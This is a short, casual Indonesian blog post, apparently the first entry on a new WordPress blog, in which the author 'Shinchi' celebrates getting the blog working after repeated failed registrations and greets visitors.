Horeee.. Akhirnya jadi juga blog Shinchi ini heheheh….
Walaupun udah berkali-kali register tapi gk di terika ama om wordpress.. tapi sekarang nggak tau juga kenapa dan bisa dehhh hehehe..

bahagiana saia, akhirnya punya blog dengan nick saia sendiri wahahahah senangnyaa…..

Dan buat yang udah mampir disini Salam Kenal yach heheh Dari Shinchi Muach…..